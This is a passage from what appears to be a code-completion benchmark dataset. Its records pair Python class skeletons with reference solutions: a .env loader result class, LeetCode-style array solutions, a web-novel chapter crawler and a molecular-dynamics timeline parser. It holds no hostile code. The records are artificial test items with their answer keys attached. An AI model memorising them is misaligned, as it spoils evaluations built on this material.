insert_to_environmental_variables(self): Inserts the parsed variables into the environmental ones. If the variable already exists, will not overwrite it. 
Returns ------- self : `instance>`\n- def raise_if_failed(self): Raises an exception with a reason why loading failed. Returns ------- self : `instance>` Raises ------ SyntaxError\n- def __repr__(self): Returns the dot env result's representation.", "prompted_full_text": "Implement the Python class `DotEnvResult` described below.\n\nClass description:\nRepresents result of loading a `.env` file or just content. Attributes ---------- file_path : `str` Path to the loaded file. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. variables : `dict` The loaded environmental variables.\n\nMethod signatures and docstrings:\n- def __new__(cls, variables, parser_failure_info, file_path): Creates a new dot-env result. Parameters ---------- variables : `dict` The loaded environmental variables. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. file_path : `str` Path to the loaded file.\n- def insert_to_environmental_variables(self): Inserts the parsed variables into the environmental ones. If the variable already exists, will not overwrite it. Returns ------- self : `instance>`\n- def raise_if_failed(self): Raises an exception with a reason why loading failed. Returns ------- self : `instance>` Raises ------ SyntaxError\n- def __repr__(self): Returns the dot env result's representation.\n\n<|skeleton|>\nclass DotEnvResult:\n \"\"\"Represents result of loading a `.env` file or just content. Attributes ---------- file_path : `str` Path to the loaded file. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. variables : `dict` The loaded environmental variables.\"\"\"\n\n def __new__(cls, variables, parser_failure_info, file_path):\n \"\"\"Creates a new dot-env result. Parameters ---------- variables : `dict` The loaded environmental variables. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. file_path : `str` Path to the loaded file.\"\"\"\n <|body_0|>\n\n def insert_to_environmental_variables(self):\n \"\"\"Inserts the parsed variables into the environmental ones. If the variable already exists, will not overwrite it. Returns ------- self : `instance>`\"\"\"\n <|body_1|>\n\n def raise_if_failed(self):\n \"\"\"Raises an exception with a reason why loading failed. 
Returns ------- self : `instance>` Raises ------ SyntaxError\"\"\"\n <|body_2|>\n\n def __repr__(self):\n \"\"\"Returns the dot env result's representation.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self = object.__new__(cls)\n self.variables = variables\n self.parser_failure_info = parser_failure_info\n self.file_path = file_path\n return self\n<|end_body_0|>\n\n<|body_start_1|>\n for key, value in self.variables.items():\n if value is None:\n value = ''\n environmental_variables.setdefault(key, value)\n if environmental_variables_binary is not None:\n environmental_variables_binary.setdefault(key.encode(), value.encode())\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n raise SyntaxError(parser_failure_info.get_error_message(), (self.file_path, parser_failure_info.line_index + 1, parser_failure_info.index + 1, parser_failure_info.line))\n return self\n<|end_body_2|>\n\n<|body_start_3|>\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' variables: ')\n repr_parts.append(repr(len(self.variables)))\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n repr_parts.append(', parser_failure_info = ')\n repr_parts.append(repr(parser_failure_info))\n file_path = self.file_path\n if file_path is not None:\n repr_parts.append(' file_path = ')\n repr_parts.append(repr(file_path))\n repr_parts.append('>')\n return ''.join(repr_parts)\n<|end_body_3|>\n", "revision_id": "53f24fdb38459dc5a4fd04f11bdbfee8295b76a4", "skeleton": "<|skeleton|>\nclass DotEnvResult:\n \"\"\"Represents result of loading a `.env` file or just content. Attributes ---------- file_path : `str` Path to the loaded file. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. variables : `dict` The loaded environmental variables.\"\"\"\n\n def __new__(cls, variables, parser_failure_info, file_path):\n \"\"\"Creates a new dot-env result. Parameters ---------- variables : `dict` The loaded environmental variables. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. file_path : `str` Path to the loaded file.\"\"\"\n <|body_0|>\n\n def insert_to_environmental_variables(self):\n \"\"\"Inserts the parsed variables into the environmental ones. If the variable already exists, will not overwrite it. Returns ------- self : `instance>`\"\"\"\n <|body_1|>\n\n def raise_if_failed(self):\n \"\"\"Raises an exception with a reason why loading failed. Returns ------- self : `instance>` Raises ------ SyntaxError\"\"\"\n <|body_2|>\n\n def __repr__(self):\n \"\"\"Returns the dot env result's representation.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DotEnvResult:\n \"\"\"Represents result of loading a `.env` file or just content. Attributes ---------- file_path : `str` Path to the loaded file. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. variables : `dict` The loaded environmental variables.\"\"\"\n\n def __new__(cls, variables, parser_failure_info, file_path):\n \"\"\"Creates a new dot-env result. Parameters ---------- variables : `dict` The loaded environmental variables. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. 
file_path : `str` Path to the loaded file.\"\"\"\n self = object.__new__(cls)\n self.variables = variables\n self.parser_failure_info = parser_failure_info\n self.file_path = file_path\n return self\n\n def insert_to_environmental_variables(self):\n \"\"\"Inserts the parsed variables into the environmental ones. If the variable already exists, will not overwrite it. Returns ------- self : `instance>`\"\"\"\n for key, value in self.variables.items():\n if value is None:\n value = ''\n environmental_variables.setdefault(key, value)\n if environmental_variables_binary is not None:\n environmental_variables_binary.setdefault(key.encode(), value.encode())\n return self\n\n def raise_if_failed(self):\n \"\"\"Raises an exception with a reason why loading failed. Returns ------- self : `instance>` Raises ------ SyntaxError\"\"\"\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n raise SyntaxError(parser_failure_info.get_error_message(), (self.file_path, parser_failure_info.line_index + 1, parser_failure_info.index + 1, parser_failure_info.line))\n return self\n\n def __repr__(self):\n \"\"\"Returns the dot env result's representation.\"\"\"\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' variables: ')\n repr_parts.append(repr(len(self.variables)))\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n repr_parts.append(', parser_failure_info = ')\n repr_parts.append(repr(parser_failure_info))\n file_path = self.file_path\n if file_path is not None:\n repr_parts.append(' file_path = ')\n repr_parts.append(repr(file_path))\n repr_parts.append('>')\n return ''.join(repr_parts)\n", "source": "the_stack_v2_python_sparse", "source_path": "hata/env/loading.py", "source_repo": "HuyaneMatsu/hata", "split": "test", "star_events_count": 3} {"blob_id": "b14c241912377e20b9cd05c7dbf38419fc272ab7", "bodies": ["l = height\nsize = 0\nfor i in range(len(l)):\n for j in range(i, len(l)):\n print(l[i], l[j])\n if l[i] < l[j]:\n size = max(size, l[i] * (j - i))\n else:\n size = max(size, l[j] * (j - i))\nreturn size", "head = 0\ntail = len(height) - 1\nsize = 0\nwhile head < tail:\n size = max(size, min(height[head], height[tail]) * (tail - head))\n if height[head] < height[tail]:\n head += 1\n else:\n tail -= 1\nreturn size"], "bodies_text": "<|body_start_0|>\n l = height\n size = 0\n for i in range(len(l)):\n for j in range(i, len(l)):\n print(l[i], l[j])\n if l[i] < l[j]:\n size = max(size, l[i] * (j - i))\n else:\n size = max(size, l[j] * (j - i))\n return size\n<|end_body_0|>\n\n<|body_start_1|>\n head = 0\n tail = len(height) - 1\n size = 0\n while head < tail:\n size = max(size, min(height[head], height[tail]) * (tail - head))\n if height[head] < height[tail]:\n head += 1\n else:\n tail -= 1\n return size\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def maxAreaBrute(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxArea(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n l = height\n size = 0\n for i in range(len(l)):\n for j in range(i, len(l)):\n print(l[i], l[j])\n if l[i] < l[j]:\n size = max(size, l[i] * (j - i))\n else:\n size = max(size, l[j] * (j - i))\n return size\n<|end_body_0|>\n\n<|body_start_1|>\n head = 0\n tail = len(height) - 1\n size = 0\n while 
head < tail:\n size = max(size, min(height[head], height[tail]) * (tail - head))\n if height[head] < height[tail]:\n head += 1\n else:\n tail -= 1\n return size\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000467", "length_bytes": 1118, "license_type": "no_license", "methods": [{"docstring": ":type height: List[int] :rtype: int", "name": "maxAreaBrute", "signature": "def maxAreaBrute(self, height)"}, {"docstring": ":type height: List[int] :rtype: int", "name": "maxArea", "signature": "def maxArea(self, height)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000227", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxAreaBrute(self, height): :type height: List[int] :rtype: int\n- def maxArea(self, height): :type height: List[int] :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxAreaBrute(self, height): :type height: List[int] :rtype: int\n- def maxArea(self, height): :type height: List[int] :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def maxAreaBrute(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxArea(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n l = height\n size = 0\n for i in range(len(l)):\n for j in range(i, len(l)):\n print(l[i], l[j])\n if l[i] < l[j]:\n size = max(size, l[i] * (j - i))\n else:\n size = max(size, l[j] * (j - i))\n return size\n<|end_body_0|>\n\n<|body_start_1|>\n head = 0\n tail = len(height) - 1\n size = 0\n while head < tail:\n size = max(size, min(height[head], height[tail]) * (tail - head))\n if height[head] < height[tail]:\n head += 1\n else:\n tail -= 1\n return size\n<|end_body_1|>\n", "revision_id": "673fb7bb900e65844b68b5826a259eb6932c5fc4", "skeleton": "<|skeleton|>\nclass Solution:\n\n def maxAreaBrute(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxArea(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def maxAreaBrute(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n l = height\n size = 0\n for i in range(len(l)):\n for j in range(i, len(l)):\n print(l[i], l[j])\n if l[i] < l[j]:\n size = max(size, l[i] * (j - i))\n else:\n size = max(size, l[j] * (j - i))\n return size\n\n def maxArea(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n head = 0\n tail = len(height) - 1\n size = 0\n while head < tail:\n size = max(size, min(height[head], height[tail]) * (tail - head))\n if height[head] < height[tail]:\n head += 1\n else:\n tail -= 1\n return size\n", "source": "the_stack_v2_python_sparse", "source_path": "11. 
Container With Most Water.py", "source_repo": "MysticEEEE/LeetCodeProblems", "split": "test", "star_events_count": 0} {"blob_id": "f8f5abe5119d83aa6a2066384693226d96de6478", "bodies": ["logger.debug('Visiting %s', self.novel_url)\nsoup = self.get_soup(self.novel_url)\nself.novel_title = soup.select_one('div.book-name').text.strip()\nlogger.info('Novel title: %s', self.novel_title)\nself.novel_author = soup.select_one('div.author span.name').text.strip()\nlogger.info('Novel author: %s', self.novel_author)\nself.novel_cover = self.absolute_url(soup.select_one('div.book-img img')['src'])\nlogger.info('Novel cover: %s', self.novel_cover)\nchapters = soup.select('ul.chapter-list a')\nfor a in chapters:\n chap_id = len(self.chapters) + 1\n if len(self.chapters) % 100 == 0:\n vol_id = chap_id // 100 + 1\n vol_title = 'Volume ' + str(vol_id)\n self.volumes.append({'id': vol_id, 'title': vol_title})\n self.chapters.append({'id': chap_id, 'volume': vol_id, 'url': self.absolute_url(a['href']), 'title': a.select_one('p.chapter-name').text.strip() or 'Chapter %d' % chap_id})\nlogger.info('%d chapters and %d volumes found', len(self.chapters), len(self.volumes))", "logger.info('Downloading %s', chapter['url'])\nsoup = self.get_soup(chapter['url'])\nchapter['title'] = soup.select_one('h1.chapter-title').text.strip()\nself.blacklist_patterns = ['^translat(ed by|or)', '(volume|chapter) .?\\\\d+']\nbody_parts = soup.select_one('div.chapter-entity')\nfor br in body_parts.select('br'):\n br.decompose()\nbody = self.extract_contents(body_parts)\nreturn '\\n\\n' + '\\n\\n'.join(body) + '\\n\\n'"], "bodies_text": "<|body_start_0|>\n logger.debug('Visiting %s', self.novel_url)\n soup = self.get_soup(self.novel_url)\n self.novel_title = soup.select_one('div.book-name').text.strip()\n logger.info('Novel title: %s', self.novel_title)\n self.novel_author = soup.select_one('div.author span.name').text.strip()\n logger.info('Novel author: %s', self.novel_author)\n self.novel_cover = self.absolute_url(soup.select_one('div.book-img img')['src'])\n logger.info('Novel cover: %s', self.novel_cover)\n chapters = soup.select('ul.chapter-list a')\n for a in chapters:\n chap_id = len(self.chapters) + 1\n if len(self.chapters) % 100 == 0:\n vol_id = chap_id // 100 + 1\n vol_title = 'Volume ' + str(vol_id)\n self.volumes.append({'id': vol_id, 'title': vol_title})\n self.chapters.append({'id': chap_id, 'volume': vol_id, 'url': self.absolute_url(a['href']), 'title': a.select_one('p.chapter-name').text.strip() or 'Chapter %d' % chap_id})\n logger.info('%d chapters and %d volumes found', len(self.chapters), len(self.volumes))\n<|end_body_0|>\n\n<|body_start_1|>\n logger.info('Downloading %s', chapter['url'])\n soup = self.get_soup(chapter['url'])\n chapter['title'] = soup.select_one('h1.chapter-title').text.strip()\n self.blacklist_patterns = ['^translat(ed by|or)', '(volume|chapter) .?\\\\d+']\n body_parts = soup.select_one('div.chapter-entity')\n for br in body_parts.select('br'):\n br.decompose()\n body = self.extract_contents(body_parts)\n return '\\n\\n' + '\\n\\n'.join(body) + '\\n\\n'\n<|end_body_1|>\n", "class_docstring": "", "class_name": "NovelUpdatesCC", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NovelUpdatesCC:\n\n def read_novel_info(self):\n \"\"\"Get novel title, autor, cover etc\"\"\"\n <|body_0|>\n\n def download_chapter_body(self, chapter):\n \"\"\"Download body of a single chapter and return as clean html format.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Visiting %s', self.novel_url)\n soup = self.get_soup(self.novel_url)\n self.novel_title = soup.select_one('div.book-name').text.strip()\n logger.info('Novel title: %s', self.novel_title)\n self.novel_author = soup.select_one('div.author span.name').text.strip()\n logger.info('Novel author: %s', self.novel_author)\n self.novel_cover = self.absolute_url(soup.select_one('div.book-img img')['src'])\n logger.info('Novel cover: %s', self.novel_cover)\n chapters = soup.select('ul.chapter-list a')\n for a in chapters:\n chap_id = len(self.chapters) + 1\n if len(self.chapters) % 100 == 0:\n vol_id = chap_id // 100 + 1\n vol_title = 'Volume ' + str(vol_id)\n self.volumes.append({'id': vol_id, 'title': vol_title})\n self.chapters.append({'id': chap_id, 'volume': vol_id, 'url': self.absolute_url(a['href']), 'title': a.select_one('p.chapter-name').text.strip() or 'Chapter %d' % chap_id})\n logger.info('%d chapters and %d volumes found', len(self.chapters), len(self.volumes))\n<|end_body_0|>\n\n<|body_start_1|>\n logger.info('Downloading %s', chapter['url'])\n soup = self.get_soup(chapter['url'])\n chapter['title'] = soup.select_one('h1.chapter-title').text.strip()\n self.blacklist_patterns = ['^translat(ed by|or)', '(volume|chapter) .?\\\\d+']\n body_parts = soup.select_one('div.chapter-entity')\n for br in body_parts.select('br'):\n br.decompose()\n body = self.extract_contents(body_parts)\n return '\\n\\n' + '\\n\\n'.join(body) + '\\n\\n'\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000468", "length_bytes": 3146, "license_type": "permissive", "methods": [{"docstring": "Get novel title, autor, cover etc", "name": "read_novel_info", "signature": "def read_novel_info(self)"}, {"docstring": "Download body of a single chapter and return as clean html format.", "name": "download_chapter_body", "signature": "def download_chapter_body(self, chapter)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000311", "prompt": "Implement the Python class `NovelUpdatesCC` described below.\n\nClass description:\nImplement the NovelUpdatesCC class.\n\nMethod signatures and docstrings:\n- def read_novel_info(self): Get novel title, autor, cover etc\n- def download_chapter_body(self, chapter): Download body of a single chapter and return as clean html format.", "prompted_full_text": "Implement the Python class `NovelUpdatesCC` described below.\n\nClass description:\nImplement the NovelUpdatesCC class.\n\nMethod signatures and docstrings:\n- def read_novel_info(self): Get novel title, autor, cover etc\n- def download_chapter_body(self, chapter): Download body of a single chapter and return as clean html format.\n\n<|skeleton|>\nclass NovelUpdatesCC:\n\n def read_novel_info(self):\n \"\"\"Get novel title, autor, cover etc\"\"\"\n <|body_0|>\n\n def download_chapter_body(self, chapter):\n \"\"\"Download body of a single chapter and return as clean html format.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Visiting %s', self.novel_url)\n soup = self.get_soup(self.novel_url)\n self.novel_title = soup.select_one('div.book-name').text.strip()\n logger.info('Novel title: %s', self.novel_title)\n self.novel_author = soup.select_one('div.author span.name').text.strip()\n logger.info('Novel author: %s', self.novel_author)\n self.novel_cover = self.absolute_url(soup.select_one('div.book-img img')['src'])\n logger.info('Novel cover: %s', self.novel_cover)\n chapters = soup.select('ul.chapter-list a')\n for a in chapters:\n chap_id = len(self.chapters) + 1\n if len(self.chapters) % 100 == 0:\n vol_id = chap_id // 100 + 1\n vol_title = 'Volume ' + str(vol_id)\n self.volumes.append({'id': vol_id, 'title': vol_title})\n self.chapters.append({'id': chap_id, 'volume': vol_id, 'url': self.absolute_url(a['href']), 'title': a.select_one('p.chapter-name').text.strip() or 'Chapter %d' % chap_id})\n logger.info('%d chapters and %d volumes found', len(self.chapters), len(self.volumes))\n<|end_body_0|>\n\n<|body_start_1|>\n logger.info('Downloading %s', chapter['url'])\n soup = self.get_soup(chapter['url'])\n chapter['title'] = soup.select_one('h1.chapter-title').text.strip()\n self.blacklist_patterns = ['^translat(ed by|or)', '(volume|chapter) .?\\\\d+']\n body_parts = soup.select_one('div.chapter-entity')\n for br in body_parts.select('br'):\n br.decompose()\n body = self.extract_contents(body_parts)\n return '\\n\\n' + '\\n\\n'.join(body) + '\\n\\n'\n<|end_body_1|>\n", "revision_id": "451e816ab03c8466be90f6f0b3eaa52d799140ce", "skeleton": "<|skeleton|>\nclass NovelUpdatesCC:\n\n def read_novel_info(self):\n \"\"\"Get novel title, autor, cover etc\"\"\"\n <|body_0|>\n\n def download_chapter_body(self, chapter):\n \"\"\"Download body of a single chapter and return as clean html format.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class NovelUpdatesCC:\n def read_novel_info(self):\n \"\"\"Get novel title, autor, cover etc\"\"\"\n logger.debug('Visiting %s', self.novel_url)\n soup = self.get_soup(self.novel_url)\n self.novel_title = soup.select_one('div.book-name').text.strip()\n logger.info('Novel title: %s', self.novel_title)\n self.novel_author = soup.select_one('div.author span.name').text.strip()\n logger.info('Novel author: %s', self.novel_author)\n self.novel_cover = self.absolute_url(soup.select_one('div.book-img img')['src'])\n logger.info('Novel cover: %s', self.novel_cover)\n chapters = soup.select('ul.chapter-list a')\n for a in chapters:\n chap_id = len(self.chapters) + 1\n if len(self.chapters) % 100 == 0:\n vol_id = chap_id // 100 + 1\n vol_title = 'Volume ' + str(vol_id)\n self.volumes.append({'id': vol_id, 'title': vol_title})\n self.chapters.append({'id': chap_id, 'volume': vol_id, 'url': self.absolute_url(a['href']), 'title': a.select_one('p.chapter-name').text.strip() or 'Chapter %d' % chap_id})\n logger.info('%d chapters and %d volumes found', len(self.chapters), len(self.volumes))\n\n def download_chapter_body(self, chapter):\n \"\"\"Download body of a single chapter and return as clean html format.\"\"\"\n logger.info('Downloading %s', chapter['url'])\n soup = self.get_soup(chapter['url'])\n chapter['title'] = soup.select_one('h1.chapter-title').text.strip()\n self.blacklist_patterns = ['^translat(ed by|or)', '(volume|chapter) .?\\\\d+']\n body_parts = soup.select_one('div.chapter-entity')\n for br in body_parts.select('br'):\n br.decompose()\n body = self.extract_contents(body_parts)\n return '\\n\\n' + '\\n\\n'.join(body) + '\\n\\n'\n", "source": "the_stack_v2_python_sparse", "source_path": "lncrawl/sources/novelupdatescc.py", "source_repo": "NNTin/lightnovel-crawler", "split": "test", "star_events_count": 2} {"blob_id": "c9c20bac00aaa7aded58be2194a496c1dbe97725", "bodies": ["k = k % len(nums)\nfor i in range(k):\n last = nums[-1]\n for j in range(len(nums) - 1, 0, -1):\n nums[j] = nums[j - 1]\n nums[0] = last", "k = k % len(nums)\n\ndef reverse(nums, left, right):\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\nreverse(nums, 0, len(nums) - 1)\nreverse(nums, 0, k - 1)\nreverse(nums, k, len(nums) - 1)"], "bodies_text": "<|body_start_0|>\n k = k % len(nums)\n for i in range(k):\n last = nums[-1]\n for j in range(len(nums) - 1, 0, -1):\n nums[j] = nums[j - 1]\n nums[0] = last\n<|end_body_0|>\n\n<|body_start_1|>\n k = k % len(nums)\n\n def reverse(nums, left, right):\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n reverse(nums, 0, len(nums) - 1)\n reverse(nums, 0, k - 1)\n reverse(nums, k, len(nums) - 1)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def rotate_1(self, nums: List[int], k: int) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_0|>\n\n def rotate_2(self, nums: List[int], k: int) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n k = k % len(nums)\n for i in range(k):\n last = nums[-1]\n for j in range(len(nums) - 1, 0, -1):\n nums[j] = nums[j - 1]\n nums[0] = last\n<|end_body_0|>\n\n<|body_start_1|>\n k = k % len(nums)\n\n def reverse(nums, left, right):\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n reverse(nums, 0, len(nums) - 1)\n reverse(nums, 0, k - 1)\n reverse(nums, k, len(nums) - 1)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000469", "length_bytes": 1025, "license_type": "no_license", "methods": [{"docstring": "Do not return anything, modify nums in-place instead.", "name": "rotate_1", "signature": "def rotate_1(self, nums: List[int], k: int) -> None"}, {"docstring": "Do not return anything, modify nums in-place instead.", "name": "rotate_2", "signature": "def rotate_2(self, nums: List[int], k: int) -> None"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002902", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def rotate_1(self, nums: List[int], k: int) -> None: Do not return anything, modify nums in-place instead.\n- def rotate_2(self, nums: List[int], k: int) -> None: Do not return anything, modify nums in-place instead.", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def rotate_1(self, nums: List[int], k: int) -> None: Do not return anything, modify nums in-place instead.\n- def rotate_2(self, nums: List[int], k: int) -> 
None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n k = k % len(nums)\n for i in range(k):\n last = nums[-1]\n for j in range(len(nums) - 1, 0, -1):\n nums[j] = nums[j - 1]\n nums[0] = last\n<|end_body_0|>\n\n<|body_start_1|>\n k = k % len(nums)\n\n def reverse(nums, left, right):\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n reverse(nums, 0, len(nums) - 1)\n reverse(nums, 0, k - 1)\n reverse(nums, k, len(nums) - 1)\n<|end_body_1|>\n", "revision_id": "d3b6883bb8b5cef30369b606d6b3ea3029b798c7", "skeleton": "<|skeleton|>\nclass Solution:\n\n def rotate_1(self, nums: List[int], k: int) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_0|>\n\n def rotate_2(self, nums: List[int], k: int) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def rotate_1(self, nums: List[int], k: int) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n k = k % len(nums)\n for i in range(k):\n last = nums[-1]\n for j in range(len(nums) - 1, 0, -1):\n nums[j] = nums[j - 1]\n nums[0] = last\n\n def rotate_2(self, nums: List[int], k: int) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n k = k % len(nums)\n\n def reverse(nums, left, right):\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n reverse(nums, 0, len(nums) - 1)\n reverse(nums, 0, k - 1)\n reverse(nums, k, len(nums) - 1)\n", "source": "the_stack_v2_python_sparse", "source_path": "Week_01/189_rotate_array.py", "source_repo": "slsefe/-algorithm015", "split": "test", "star_events_count": 0} {"blob_id": "e9313b3a10b4b607d77d4a726a3210c85c080256", "bodies": ["self.name = name\nself.timeline_files = timeline_files\nself.timeline_props = timeline_props\nself.timeframe = timestep * frequency * 1e-06\nself.residues = []\nself.parse_tml()", "for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return True\nreturn False", "for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return resi", "for file, prop in zip(self.timeline_files, self.timeline_props):\n with open(file) as fl:\n timeline = [line.rstrip('\\n').split() for line in fl.readlines() if '#' not in line]\n timeline = [[int(line[0]), line[2], float(line[3]) * self.timeframe, float(line[4])] for line in timeline]\n for line in timeline:\n new_residue = TimelineResidue(line[0], line[1])\n new_residue.add_property(prop, [line[2:4]])\n if new_residue not in self:\n self.residues.append(new_residue)\n else:\n self.get_resi(new_residue).properties[prop].append(line[2:4])\n for resi in self.residues:\n resi.mean_property(prop)", "resids = [resi.resid for resi in self.residues]\nprop_values = [[resi.means[prop] for resi in self.residues]]\nreturn np.array(list(zip(resids, *prop_values)))", "resids = [resi.resid for resi in self.residues]\nprop_values = []\nfor prop in props:\n prop_values.append([resi.means[prop] for resi in self.residues])\ndataseries = [np.array(list(zip(resids, *prop_values)))]\nmmplt.plot_simple_multiple_numpy(dataseries, 'Residue position', prop, [self.name], self.name, sizex=2.5, sizey=1.5)"], "bodies_text": "<|body_start_0|>\n self.name 
= name\n self.timeline_files = timeline_files\n self.timeline_props = timeline_props\n self.timeframe = timestep * frequency * 1e-06\n self.residues = []\n self.parse_tml()\n<|end_body_0|>\n\n<|body_start_1|>\n for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return resi\n<|end_body_2|>\n\n<|body_start_3|>\n for file, prop in zip(self.timeline_files, self.timeline_props):\n with open(file) as fl:\n timeline = [line.rstrip('\\n').split() for line in fl.readlines() if '#' not in line]\n timeline = [[int(line[0]), line[2], float(line[3]) * self.timeframe, float(line[4])] for line in timeline]\n for line in timeline:\n new_residue = TimelineResidue(line[0], line[1])\n new_residue.add_property(prop, [line[2:4]])\n if new_residue not in self:\n self.residues.append(new_residue)\n else:\n self.get_resi(new_residue).properties[prop].append(line[2:4])\n for resi in self.residues:\n resi.mean_property(prop)\n<|end_body_3|>\n\n<|body_start_4|>\n resids = [resi.resid for resi in self.residues]\n prop_values = [[resi.means[prop] for resi in self.residues]]\n return np.array(list(zip(resids, *prop_values)))\n<|end_body_4|>\n\n<|body_start_5|>\n resids = [resi.resid for resi in self.residues]\n prop_values = []\n for prop in props:\n prop_values.append([resi.means[prop] for resi in self.residues])\n dataseries = [np.array(list(zip(resids, *prop_values)))]\n mmplt.plot_simple_multiple_numpy(dataseries, 'Residue position', prop, [self.name], self.name, sizex=2.5, sizey=1.5)\n<|end_body_5|>\n", "class_docstring": "", "class_name": "TimelineSegment", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TimelineSegment:\n\n def __init__(self, timeline_files, timeline_props, timestep, frequency, name):\n \"\"\":param timeline_files: tml files :param timeline_props: tml files properties :param timestep: md timestep :param frequency: md trajectory save frequency\"\"\"\n <|body_0|>\n\n def __contains__(self, residue):\n \"\"\":param residue: check if residue present in timeline :return: true if present\"\"\"\n <|body_1|>\n\n def get_resi(self, residue):\n \"\"\":param residue: selected residue :return: get residue from timeline\"\"\"\n <|body_2|>\n\n def parse_tml(self):\n \"\"\"parse tml file\"\"\"\n <|body_3|>\n\n def get_prop(self, prop):\n \"\"\":param prop: :return:\"\"\"\n <|body_4|>\n\n def print_prop(self, props):\n \"\"\":param props: properties to plot\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.name = name\n self.timeline_files = timeline_files\n self.timeline_props = timeline_props\n self.timeframe = timestep * frequency * 1e-06\n self.residues = []\n self.parse_tml()\n<|end_body_0|>\n\n<|body_start_1|>\n for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n for resi in self.residues:\n if 